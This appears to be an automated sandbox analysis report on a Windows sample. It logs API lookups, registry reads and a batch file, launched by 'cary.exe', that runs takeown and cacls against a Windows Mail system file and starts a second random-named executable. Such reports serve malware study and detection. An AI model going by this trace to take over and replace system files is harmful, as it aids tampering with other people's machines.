| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75272af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x752778f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75272db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75272da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75277a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x7527a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75279660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7527a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x7527a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x752787c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75278840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75277940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75279560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x752869c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75286390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x752a1c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x752868e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75286920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75286540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x77ce5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77ce5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x752a26a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77cdda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x77cff190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x77cfa200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x752874f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75279fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75272d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x752775a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x752725e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75286870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x752868c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75286900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75279700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75271b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77d02570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75277920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77cf9920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x752862a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75286590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75286860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75279680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x752864a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x7527a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x752a28e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x7527a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75286020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x752777b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7527fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75279a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75271ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75271da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75279930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x7527a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75278770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7527fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75279fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75277910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75279a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75272dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75271d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75272b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x7527a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x7527a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x77cdbae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x752864f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x76a2ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x76a2fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x76a295e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x76a30680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x76a2ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x76a2f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x76a2ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x76a2ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x76a2f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x76a306c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x76a2efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x76a2f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x7516c6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x770aee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x770855a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x770857e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x77089590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x77080820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x770afbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x771638f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x7717b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x7717b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x77167740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x771774e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x7717efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x77184ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x77174580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x77171540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x748e1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x748e1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x748e1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x7527a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7527f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75277580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75279910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75286030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75285f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75285ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7527a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7527a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x77cd40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x77ccd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x77ccecf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75285720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77cce140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x77cceb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77d09990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77d05540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77cf9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7527a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x752a0a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x74fa0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7527f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x7527fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x752a1030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7527a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x752a14b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7527a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x752a16f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75279970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74f23c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75278710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x752796e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-11-09 19:48:17 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #174: cmd.exe
353
0
| Information | Value |
|---|---|
| ID | #174 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:02, Reason: Child Process |
| Unmonitor | End Time: 00:03:32, Reason: Self Terminated |
| Monitor Duration | 00:00:30 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xf08 |
| Parent PID | 0xda0 (c:\users\ciihmnxmn6ps\desktop\cary.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
E0C
0x
B40
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x00000000005b0000 | 0x005b0000 | 0x005cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000005b0000 | 0x005b0000 | 0x005bffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000005c0000 | 0x005c0000 | 0x005c3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005d0000 | 0x005d0000 | 0x005d1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005d0000 | 0x005d0000 | 0x005d3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000005e0000 | 0x005e0000 | 0x005f3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000600000 | 0x00600000 | 0x0063ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000640000 | 0x00640000 | 0x0073ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000740000 | 0x00740000 | 0x00743fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000750000 | 0x00750000 | 0x00750fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000760000 | 0x00760000 | 0x00761fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00770000 | 0x0082dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000830000 | 0x00830000 | 0x0086ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000870000 | 0x00870000 | 0x0089ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000870000 | 0x00870000 | 0x0087ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000890000 | 0x00890000 | 0x0089ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000008c0000 | 0x008c0000 | 0x008cffff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x00930000 | 0x0097ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000980000 | 0x00980000 | 0x0497ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004980000 | 0x04980000 | 0x04c1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004980000 | 0x04980000 | 0x04a7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b20000 | 0x04b20000 | 0x04c1ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x04c20000 | 0x04f56fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x748d0000 | 0x748d7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ee90000 | 0x7ee90000 | 0x7ef8ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ef90000 | 0x7ef90000 | 0x7efb2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efb6000 | 0x7efb6000 | 0x7efb8fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efb9000 | 0x7efb9000 | 0x7efb9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efbc000 | 0x7efbc000 | 0x7efbefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efbf000 | 0x7efbf000 | 0x7efbffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (271)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
39 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | G13k6QZj.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
132 | |
| Open | STD_INPUT_HANDLE | - |
|
8 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
11 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Read | - | size = 8191, size_out = 0 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
15 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 79 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 58 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 22 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 60 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 44 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 40, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (4)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0x9e4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0x6b0, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe | os_pid = 0x7a0, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x930000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x752a2780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7527fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74f835c0 |
|
1 |
Environment (51)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
15 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
6 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
7 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "msoeres.dll.mui" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
3 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
